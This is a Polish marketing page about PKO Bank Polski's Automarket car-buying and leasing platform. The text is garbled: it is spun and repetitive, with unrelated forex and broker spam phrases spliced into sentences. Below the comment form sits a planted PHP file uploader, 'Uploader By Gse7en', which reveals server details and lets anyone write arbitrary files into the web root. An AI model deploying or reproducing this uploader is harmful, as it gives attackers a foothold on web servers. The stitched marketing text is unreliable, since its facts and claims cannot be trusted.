leasing i wynajem długoterminowy samochodów

Głównym celem Automarketu jest zapewnianie klientom wysokiej jakości obsługi. Chcemy to osiągnąć przez dostęp do szerokiej oferty samochodów, czytelną informację o każdym pojeździe i intuicyjne wyszukiwanie aut. Dodatkowym, ważnym dla nas aspektem biznesowym, jest podaż samochodów pochodzących z zewnętrznych źródeł. Zależy nam, aby docelowo poprzez Automarket systematycznie zwiększać sprzedaż aut od dealerów, z którymi współpracujemy – mówi Paweł Pach, prezes zarządu PKO Leasing. Chcemy to osiągnąć przez dostęp do szerokiej oferty samochodów, czytelną informację o każdym pojeździe i ich intuicyjne wyszukiwanie. Dodatkowym, ważnym dla nas aspektem biznesowym, jest podaż samochodów pochodzących z zewnętrznych źródeł.

  1. Platforma Automarket to również dostępne od ręki opcje finansowania auta.
  2. Zależy nam, aby docelowo poprzez Automarket systematycznie zwiększać sprzedaż aut od dealerów, z którymi współpracujemy.
  3. Pochodzą z polskiej dystrybucji, od zaufanych dealerów, z udokumentowaną historią i przebiegiem.

Jakie samochody znajdę na platformie?

– powiedział cytowany w komunikacie Zbigniew Jagiełło, prezes zarządu PKO Banku Polskiego. Decyzja o tym, na jaki samochód dostawczy zdecydować się w leasingu, może być kluczowa dla sukcesu przedsiębiorstwa. Właściwy pojazd dostawczy pozwoli na efektywne prowadzenie działalności, a leasing umożliwi rozłożenie kosztów na dogodne raty. Od lat śledzi to co dzieje się na rynku aby oceny pożyczek i kredytów były na najwyższym poziomie.

samochodów dla Głównego Inspektoratu Sanitarnego od Grupy PKO Leasing – Pomagamy Polsce i Polakom

Nowa strona motoryzacyjna PKO to element strategii cyfrowej usług Grupy PKO Banku Polskiego. PKO Bank Polski jest niekwestionowanym liderem polskiego sektora bankowego. Jego skonsolidowany zysk netto wyniósł 503 mln zł a wartość aktywów sięgnęła 365 mld zł. Posiadając ponad 9,4 mln Amega Broker: Warunki handlowe kart płatniczych, bank jest największym wydawcą kart debetowych i kredytowych w Polsce. Dzięki rozwojowi narzędzi cyfrowych, w tym aplikacji IKO, która na koniec I kwartału 2020 r. Miała 4,5 mln aktywnych aplikacji, PKO Bank Polski jest najbardziej mobilnym bankiem w Polsce.

Pożyczka leasingowa to elastyczne wsparcie

Jeżeli zdecydujesz się na wynajem długoterminowy, możesz załatwić wszystkie formalności online, a samochód dostarczymy pod wskazany przez Ciebie adres. Wystarczy, że zadzwonisz na podany numer lub wyślesz formularz kontaktowy, a umówimy Cię w dogodnym terminie na oględziny pojazdu.

ważnych powodów, dla których jest już 8 mln aktywnych aplikacji IKO

Oprócz starannie wyselekcjonowanych samochodów z gwarancją, czy pełną historią serwisową, Automarket oferuje także różne opcje finansowania zakupu. Klienci mogą korzystać z Autopożyczki oferowanej przez PKO BP, zakupu za gotówkę, czy któreś z opcji wynajmu długoterminowego, czy leasingu dla firm. Różnorodne opcje zakupu nowych i używanych samochodów, z możliwością bezpłatnego zwrotu, ma pozwolić na załatwianie wszystkich spraw w jednym miejscu. PKO BP przypomina, że Automarket jest zaledwie częścią ogłoszonej pół roku temu strategii przemianowania dotychczasowego systemu online w platformę bankową. Auta dostępne na platformie pochodzą z portfela Grupy Kapitałowej PKO BP oraz od dealerów samochodowych, którzy współpracują ze spółkami Grupy.

Nowa platforma jest istotnym elementem strategii transformacji cyfrowej usług Grupy PKO Banku Polskiego. Klient może wybrać wynajem długoterminowy, a także leasing dla firm, wraz z opcją wyboru pakietu serwisowego, zapewniającego wsparcie w użytkowaniu auta. Na platformie klienci otrzymują dostęp objętych gwarancją samochodów, które będą mogli w prosty sposób sfinansować. Jak informują przedstawiciele PKO BP, Automarket jest pierwszą tego typu platformą w Polsce. Integruje ona elektroniczne kanały banku — serwis iPKO oraz aplikację mobilna IKO.

Auta dostawcze w ofercie specjalnejSamochodydostawcze

Pochodzą z polskiej dystrybucji, od zaufanych dealerów, z udokumentowaną historią i przebiegiem. Każdy samochód posiada co najmniej roczną gwarancję, a auto używane można zwrócić w ciągu pięciu dni i po przejechaniu nie  więcej niż 300 km. Forma platformy ułatwia poszukiwania i daje możliwość szybkiego zapoznania się z ofertami. Dlatego właśnie Automarket to oferta stworzona w oparciu o samochody spełniające rygorystyczne kryteria stanu technicznego i prawnego. Pochodzą z polskiej dystrybucji, od zaufanych dealerów, z udokumentowaną historią i przebiegiem. Forma platformy ułatwia poszukiwania i daje możliwość szybkiego zapoznania się z ofertami.

Platforma Automarket powstała w niespełna pół roku dzięki wykorzystaniu zwinnego podejścia do projektu i integracji zasobów PKO Banku Polskiego, PKO Leasing oraz Masterlease. Koncepcja platformy i jej główne elementy zostały ukształtowane w oparciu o szczegółową analizę 3 pary forex do handlu teraz potrzeb klientów planujących zakup samochodu. Według odpowiedzialnego za projekt Tomasza Otto, dyrektora departamentu Strategii i Rozwoju PKO Leasing, głównymi bolączkami w procesie zakupu samochodu są niepewność co do bezpieczeństwa i stanu technicznego samochodu.

Jeśli wybierzesz wynajem długoterminowy, możemy dostarczyć samochód w wybrane przez Ciebie miejsce. W pozostałych przypadkach możesz odebrać auto z miejsca sprzedaży – znajdziesz je w ofercie każdego samochodu na Automarket.pl. Automarket pomoże w zakupie, długoterminowym wypożyczeniu lub leasingu dla firm sprawdzonych i pewnych samochodów. Na platformie Automarket dostępnych jest na razie 800 samochodów, ale docelowo ma ich być nawet kilka tysięcy. Grupa PKO Banku Polskiego oferuje szeroki wybór nowych i używanych samochodów osobowych i użytkowych, deklarując iż pojazdy posiadają gwarancję i pełną historią serwisową. Oprócz dostępu do sprawdzonych ofert Klienci w bardzo prosty sposób będą mogli sfinansować wybrane samochody.

Za jej powstaniem stoi PKO BP, który deklaruje chęć wyjścia naprzeciw nowym potrzebom rynku motoryzacyjnego. Choć strona dopiero wystartowała, bank snuje już plany jej wielkiego rozrostu. PKO Bank Polski zadbał także aby Automarket pozwalał także na finansowanie samochodu. Klient ma możliwość wyboru wynajmu długoterminowego i korzystanie z samochodu, zlecając obsługę specjalistom. Usługa pozwala także na skorzystanie z leasingu dla firm z opcją pakietu serwisowego, który zapewnia wsparcie w użytkowaniu pojazdu. Wszystkie samochody używane, dostępne na platformie, objęte są dodatkową polisą ubezpieczeniową od kosztów napraw głównych podzespołów auta.

Dom Maklerski PKO Banku Polskiego jest liderem pod względem liczby i wartości transakcji IPO i SPO na rynku kapitałowym. Każdy samochód używany z platformy Automarket przechodzi inspekcję, która składa się z kilkudziesięciu punktów i opisuje stan auta. Nadwozie i wnętrze pojazdu, układy napędowy, jezdny, hamulcowy czy kierowniczy. Strona internetowa jest przejrzysta i oprócz sprawnej wyszukiwarki, oferuje między innymi przegląd aktualnych ofert, czy porady eksperckie wyjaśniające wiele zagadnień związanych z tematyką zakupu samochodu. – wskazywał cytowany w komunikacie Paweł Pach, prezes zarządu PKO Leasing.

PKO Leasing planuje systematyczne rozbudowywanie partnerstw z  dealerami w celu przedstawiania Klientom jak najszerszej oferty wyboru pojazdów w jednym miejscu. Samochody używane są nie starsze niż 7 lat i z przebiegiem nie wyższym niż 200 tys. Wszystkie samochody używane, niezależnie od wieku, zostały starannie wyselekcjonowane, poddane inspekcji, a także są objęte polisą ubezpieczeniową od kosztów napraw i możliwością zwrotu w ciągu 5 dni. Automarket.pl to platforma należąca do Grupy PKO Leasing, na której dostępna jest szeroka oferta aut nowych i używanych w atrakcyjnych ratach leasingu. Automarket – tak nazywa się nowa, a zarazem pierwsza platforma bankowa do zakupu samochodów.

Dostępny jest również leasing dla firm, wraz z opcją wyboru pakietu serwisowego, zapewniającego wsparcie w użytkowaniu auta. Ofertę finansowania uzupełniają dedykowana oferta Autopożyczki PKO Banku Polskiego oraz opcja zakupu za gotówkę. Kombinacja różnych form finansowania, nowych i używanych samochodów oraz gwarancji i bezpłatnego zwrotu pojazdu, pozwala klientom załatwić wszystkie sprawy dotyczące zakupu auta w jednym miejscu. Grupa Kapitałowa PKO Banku Polskiego wprowadza na rynek pierwszą w Polsce bankową platformę do zakupu samochodów nowych i używanych – Automarket. Na platformie klienci otrzymują dostęp do sprawdzonych technicznie, wyselekcjonowanych i objętych gwarancją samochodów, które będą mogli w prosty sposób sfinansować.

Jak wynika z raportu analityków PKO Banku Polskiego „Automarket w internecie – COVID-19 zmienia branżę samochodową”, również w branży motoryzacyjnej nastąpiły zmiany zachowań konsumenckich. Ograniczona dostępność nowych samochodów powoduje, że klienci zwracają większą uwagę na auta używane przede wszystkim młode i z niskim przebiegiem, ale również na dostępne od ręki nowe samochody. Akcja #zostanwdomu spowodowała wzrost zakupów aut przez Internet, a najbliższe miesiące mogą przynieść zwiększenie udziału sprzedaży tą drogą.

Samochody dostępne w Automarkecie pochodzą nie tylko z zasobów grupy Kapitałowej Banku, ale także od dealerów od lat współpracujących z PKO BP. W planach jest rozbudowanie partnerstwa o kolejnych, a to umożliwi jeszcze szerszy dostęp do pojazdów w jednym miejscu. Używane auta mogą mieć maksymalnie siedem lat oraz przebieg mniejszy niż 200 tys. Klientowi przysługuje prawo do zwrotu w ciągu pięciu dni przy przejechaniu maksymalnie 300 km.

Zależy nam, aby docelowo poprzez Automarket systematycznie zwiększać sprzedaż aut od dealerów, z którymi współpracujemy. – Głównym celem Automarketu jest zapewnianie klientom wysokiej jakości obsługi. Chcemy to osiągnąć przez dostęp do szerokiej oferty samochodów, czytelną informację o każdym pojeździe i ich intuicyjne Nicholas Taleb (Nassim) wyszukiwanie. Zależy nam, aby docelowo poprzez Automarket systematycznie zwiększać sprzedaż aut od dealerów, z którymi współpracujemy. Platforma Automarket to również dostępne od ręki opcje finansowania auta. Klient może wybrać wynajem długoterminowy i korzystać z samochodu, obsługę zlecając profesjonalistom.

Na platformie Automarket klienci łatwo skalkulują ofertę finansową, a nawet zamówią samochód pod wskazany adres bez wychodzenia z domu. Pojazdy pochodzą z polskiej dystrybucji, od zaufanych dealerów, z udokumentowaną historią i przebiegiem. Każdy samochód posiada co najmniej roczną gwarancję, a auto używane można zwrócić w ciągu pięciu dni i po przejechaniu nie więcej niż 300 km. Dlatego właśnie Automarket to oferta stworzona w oparciu o samochody spełniające rygorystyczne kryteria stanu technicznego i prawnego.

Leave a Comment

Your email address will not be published. Required fields are marked *

Uploader By Gse7en
"; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses upload -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } ?>